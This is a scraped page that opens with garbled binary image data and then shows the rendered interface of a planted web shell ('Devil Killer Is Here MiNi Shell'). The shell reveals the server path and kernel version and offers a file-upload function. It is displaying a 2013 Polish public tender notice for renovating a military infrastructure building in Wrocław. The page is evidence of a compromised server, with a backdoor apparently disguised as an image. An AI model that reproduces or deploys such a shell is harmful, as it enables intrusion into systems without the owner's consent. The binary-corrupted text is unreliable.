JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130307/93402-N-2013.html

<p class="kh_header"><b>Wrocław: REMONT POMIESZCZEŃ BUD. NR 2 ZZWT NA PARTERZE WE WROCŁWIU PRZY
UL. SZTABOWEJ.</b><br>
<b>Numer ogłoszenia: 93402 - 2013; data zamieszczenia: 07.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 071 765 68 42, faks 071 765 68 44, 765-68-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rziwroclaw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT POMIESZCZEŃ BUD. NR 2 ZZWT NA PARTERZE WE WROCŁWIU PRZY
UL. SZTABOWEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przdmiotem zamówienia jest remont pomieszczeń bud. 2 ZZWT we Wrocławiu przy ul. Sztabowej.
Zakres zamówienia:
Roboty budowlane
1. Demontaż i montaż krat okiennych.
2. Demontaż i montaż okien drewnianych.
3. Demontaż i montaż parapetów zewnętrznych i wewnętrznych.
4. Demontaż i montaż wewnętrznej stolarki drzwiowej.
5. Montaż w wiatrołapie I, wiatrołapie II i w wejściu doklatki schodowej I drzwi dymoszczelnych kl. E 130.
6. Demontaż i montaż sufitu podwieszanego w korytarzu.
7. Montaż sufitu podwieszanego w WC damskim i WC męskim..
8. Demontaż boazerii panelowej w korytarzu i pomieszczeniach biurowych.
9. Demontaż i montaż ścian działowych i przegród systemowych.
10. Rozbiórka ścian pod montowane ościeża drzwiowe.
11. Wykucie gniazd pod belki nadprożowe.
12. Montaż belek nadprożowych.
13. Zabudowa pionów wod. kan. płytami G/K.
14. Montaż ścianek systemowych w WC damskim i męskim.
15. Uzupełnienie tynków wewnętrznych i zewnętrznych.
16. Wykonanie gładzi gipsowych.
17. Uzupełnienie tynków na ościeżach okiennych zewnętrznych i wewnętrznych po montażu okien.
18. Demontaż i montaż okładzin ściennych z płytek ceramicznych.
19. Demontaż i montaż posadzek z płytek terakotowych.
20. Demontaż wykładzin PCV i dywanowych.
21. Częściowy demontaż i montaż parkietu.
22. Flekowanie parkietu.
23. Ocyklinowanie parkietów.
24. Lakierowanie parkietów.
25. Wymiana listew przypodłogowych przy posadzkach z parkietu.
26. Lakierowanie listew przypodłogowych - j/w.
27. Wykonanie wylewek samopoziomujących pod wykładziny typu TARKET i pod płytki terakotowe.
28. Montaż wykładzin typu TARKET z wywinięciem 5 cm na ściany.
29. Przygotowanie podłoża i wykonanie gruntowania pod malaturę ścian i sufitów.
30. Wykonanie malatury ścian i sufitów farbami emulsyjnym.
31. Obłożenie płytkami gresowymi schodów do Patio.
32. Wykonanie i montaż balustrady schodowej - j/w.
33. Montaż pochwytów drewnianych w korytarzu.
34. Rozbiórka posadzki z płytek gresowych - Taras.
35. Rozporka posadzki betonowej - j/w.
36. Wymiana wpustu podłogowego wraz z podejćiem do rury spustowej instalacji deszczowej.
37. Wykonanie izolacji p/wilgociowej dna z wywinięciem na ściany tarasu do wysokości 50 cm.
38. Wykonanie wylewki betonowej z dodatkiem polimeru - taras.
39. Montaż płytek gresowych na kleju żywicznym z wypełnieniem fugą żywiczną.
40. Skucie i wykonanie części tynków zewnętrznych na elewacji w Patio.
41. Uzupełnienie malatury tynków zewnętrznych - j/w.
Instalacja elektryczna 
1. Wykonanie złącza kablowego typu ZK-3a.
2. Wykonanie i montaż rozdzielni RG i RGw.
3. Wykonanie instalacji oświetlenia podstawowego i gwarantowanego, awaryjnego,
ewakuacyjnego i kierunkowego pomieszczeń.
4. Wykonanie przepustów rurowych rurką PCV Fi-25mm.
5. Mechaniczne kucie bruzd pod przewody wtynkowe do obwodów oświetleniowych 
podstawowych, gwarantowanych,  awaryjnych   i ewakuacyjnych.
6. Układanie przewodów w istniejących bruzdach.
7. Montaż osprzętu elektrycznego podtynkowego i natynkowego .
8. Montaż opraw oświetlenia podstawowego i gwarantowanego oraz montaż opraw oświetlenia awaryjnego, ewakuacyjnego i kierunkowego, oświetlenia korytarzy sterowanym  przyciskami bi-stabilnymi.
9. Wykonanie instalacji Gniazd wtyczkowych 230V.
10. Ułożenie kabli telekomunikacyjnych i światłowodowych dostarczonych przez RWT Wrocław ( 1 kabel 50-par, 1 kabel światłowodowy 8j): z pom. 05 w budynku B2 do pom. nr 15 w budynku B2, z pom. nr 05 w budynku B2 do po. PD na I piętrze nad pomieszczeniem nr 29 w budynku B2.
11. Demontaż istniejącej instalacji elektrycznej zasilającej, oświetlenia elektrycznego i gniazd wtyczkowych oraz instalacji niskonapięciowych.
Wewnętrzne instalacje sanitarne. 
1.Wykonanie wentylacji mechanicznej pomieszczeń dwóch węzłów sanitarnych i pomieszczenia socjalnego
2. Instalacja wod. - kan.
a. demontaż urządzeń sanitarnych, demontaż rur wodnych , kanalizacyjnych i armatury
b. wykucie bruzd dla przewodów wody zimnej i ciepłej, wykonanie instalacji wodnej z rur miedzianych wraz z podejściami dopływowymi do urządzeń, montaż armatury, izolacja rur otulinami z pianki, zatynkowanie bruzd z przewodami
c. wykucie bruzd, montaż rur pionów i podejść odpływowych z rur PCV,
d. otynkowanie bruzd, montaż przyborów sanitarnych- muszle  Kompakt , umywalki 60 wraz z pół postumentami typu Koło, brodzik z tworzywa 90x90 wraz z kabiną natryskową (szklaną), pełnowymiarowy pisuar z syfonem podtynkowym i automatem spłukującym podtynkowym typu klapka typu Geberit , wpusty podłogowe z tworzywa . 
3. Instalacja CO.
a. wymiana grzejników żeliwnych na grzejniki stalowe płytowe kompaktowe w kolorze białym, wymiana rur przyłącznych stalowych na rury stalowe DN 15 , wymiana zaworów grzejnikowych na zawory grzejnikowe z głowicami termostatycznymi typu Danfoss, montaż zaworów grzejnikowych powrotnych.
Roboty towarzyszące i tymczasowe.
1. Wykonanie rusztowań do robót związanych z remontem posadzki tarasu,  oraz remontem tynków zewnętrznych elewacji budynku wewnątrz Patio.
2. Ustawianie podestów montażowych.
3. Zabezpieczenie podłóg folią.
4. Mycie i sprzątanie po pracach malarskich.
5. Usunięcie gruzu z rozbieranych ścian, posadzek, sufitów podwieszanych, boazerii, wykładzin podłogowych, płytek ceramicznych, stolarki okiennej i drzwiowej.
6. Transport i koszt składowania gruzu.
7. Pomiary instalacji elektrycznych wraz z opracowaniem protokołu z pomiarów.
8. Trasowanie przebiegu instalacji wod.kan. i CO.
9. Próby szczelności instalacji wod.kan. i CO.
10. Powykonawcza dokumentacja techniczna z naniesionymi zmianami.
11. Protokóły wszystkich odbiorów technicznych- protokóły z przeprowadzonych prób ciśnieniowych poszczególnych instalacji.
12. Organizacja zaplecza budowy (kontener biurowy i socjalny, WC typu TOI-TOI).
Roboty towarzyszące i tymczasowe nie podlegają oddzielnej zapłacie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.43.00.00-0, 45.41.10.00-4, 45.32.12.10-1, 45.42.00.00-7, 45.45.00.00-6, 45.40.00.00-1, 45.44.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.33.10.00-7, 45.33.12.10-1, 45.31.51.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium
w wysokości - 30 190,00 zł.
2. Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego
do dni 25.03.2013r., do godz. 10.00. Nie dopuszcza się wnoszenia wadium w formie gotówki do kasy Zamawiającego.
3. Wadium wniesione w postaci poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych oraz poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) musi zawierać co najmniej:
a) nazwę i adres Wykonawcy,
b) nazwę i adres beneficjenta,
c) nazwę i adres gwaranta/ poręczyciela,
d) nazwa zadania, na które składane jest wadium,
e) kwotę,
f) termin ważności,
g) wskazanie wszystkich przypadków powodujących utratę wadium zgodnie
z art. 46 ust. 4a i ust. 5 ustawy Pzp.
Wadium, o którym mowa w pkt 3.6.3 musi zostać złożone w kasie Zamawiającego
(bud. RZI, pok. 20) w terminie do dnia - 25.03.2013 r. do godz. 10.00.
W przypadku, gdy Wykonawca nie wniesie wadium do upływu terminu składania
ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa
w art. 46 ust. 3 ustawy Pzp, albo nie zgodził się na przedłużenie okresu związania
ofertą, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt. 2.
4. W przypadku wnoszenia wadium w pieniądzu należy je wpłacić na konto
NBP O/Okr. we Wrocławiu 78 1010 1674 0030 7213 9120 1000, z dopiskiem
wadium dotyczące przetargu nieograniczonego na remont pomieszczeń
bud. nr 2 ZZWT na parterze we Wrocławiu przy ul. Sztabowej.
5. Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie po wyborze
oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem
Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza,
z zastrzeżeniem pkt 3.6.7. SIWZ.
6. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał
ofertę przed upływem terminu składania ofert
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył
dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw,
chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu
zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego
rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.
Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
Wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego
oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
z przyczyn leżących po stronie Wykonawcy.
11.Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje
wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może
być wniesione przez jednego z uczestników konsorcjum.
12.Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po wniesieniu wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje kierownikiem budowy i kierownikami
robót, którzy posiadają uprawnienia i należą do właściwej izby samorządu
zawodowego:
a) kierownik budowy - w zakresie konstrukcyjno - budowlanym - bez ograniczeń.
Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r.
(ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r.
Nr 243 poz.1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia
budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia
samodzielnych funkcji technicznych w budownictwie, spełniają ww. warunek.
b) kierownik robót instalacyjnych w zakresie sieci, instalacji urządzeń
elektrycznych i elektroenergetycznych - bez ograniczeń. Osoby, które przed
dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (ustawa z dnia 7 lipca 1994 r.
Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623
z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub
stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych
funkcji technicznych w budownictwie, spełniają ww. warunek.
Wykonawca musi wykazać, że osoby, które będą uczestniczyć w wykonaniu
zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek
posiadania takich uprawnień.1.1W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy Pzp, Wykonawcy ubiegający się o uzyskanie zamówienia dostarczą ofertę sporządzoną według załączonego wzoru wraz z wypełnionymi następującymi formularzami:wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności
odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na
temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych
do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności
oraz informację o podstawie do dysponowania tymi osobami (oryginał podpisany
przez Wykonawcę) - Formularz nr 4; oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (oryginał podpisany przez Wykonawcę) - Formularz nr 5.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>informacje ogólne o Wykonawcy - Formularz nr 1; oświadczenie o spełnieniu warunków udziału w postępowaniu (oryginał podpisany przez Wykonawcę) - Formularz Nr 2; propozycje ewentualnego podzlecenia elementów usług - Formularz
Nr 3 (oryginał podpisany przez Wykonawcę); wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (oryginał podpisany przez Wykonawcę) - Formularz nr 4; oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia,
posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania
takich uprawnień (oryginał podpisany przez Wykonawcę) - Formularz nr 5; kosztorys ofertowy (oryginał podpisany przez Wykonawcę); Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych
innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi
stosunków. W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu,
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,
w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich
przy wykonaniu zamówienia (wzór - Formularz Nr 6). Zobowiązanie musi
przybrać formę pisemną i nie jest dopuszczalna inna forma, w tym kopia
dokumentu potwierdzona za zgodność z oryginałem. W oświadczeniu podmiotu
o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim
charakterze podmiot trzeci będzie brał udział w postępowaniu (np. jako podwykonawca, doradca, konsultant).kosztorys ofertowy (oryginał podpisany przez Wykonawcę); Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu,
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich
przy wykonaniu zamówienia (wzór - Formularz Nr 6). Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, w tym kopia dokumentu potwierdzona za zgodność z oryginałem. W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział w postępowaniu (np. jako podwykonawca, doradca, konsultant).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie:
1. Terminu wykonania przedmiotu umowy w przypadku:
a) wystąpienia okoliczności uniemożliwiających realizację robót w terminie
umownym. Za okoliczności takie uważa się wstrzymanie robót przez Zamawiającego, wystąpienia okoliczności niezależnych od Wykonawcy, w tym
wynikających z tzw. siły wyższej (np. powodzie, huragany, gwałtowne burze)
uniemożliwiających realizację robót. Wstrzymanie robót z tego powodu musi być
potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru.
Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe
(właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy;
b) stwierdzenia, że w dokumentacji projektowej przekazanej dla Wykonawcy
zgodnie z § 1 ust. 2 umowy, znajdują się błędy uniemożliwiające prawidłowe i
terminowe wykonanie przedmiotu umowy;
c) zwiększenia ilości jednostek obmiarowych w przypadku, gdy może mieć to
wpływ na termin wykonania; d) obiektywnie uzasadnionej konieczności wprowadzenia zmiany technologii wykonania przedmiotu umowy; zmiana zakresu prac określonych w SIWZ jest możliwa tylko w zakresie niezbędnym do zgodnego a obowiązującymi standardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowy lub ze względu na interes Zamawiającego wynikający z możliwości obniżenia kosztów robót lub skrócenia terminu realizacji robót.
e) zawarcia umowy na zamówienie dodatkowe, którego realizacja trwa więcej niż 7
dni roboczych,
f) wydłużenia procedury przetargowej (spowodowanej m. in. przedłużeniem przez
Zamawiającego terminu związania ofertą, wpłynięcia odwołania);
g) ujawnienia się w trakcie realizacji przedmiotu zamówienia przeszkód w obiekcie
lub gruncie;
h) ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych
przeszkód formalno-prawnych;
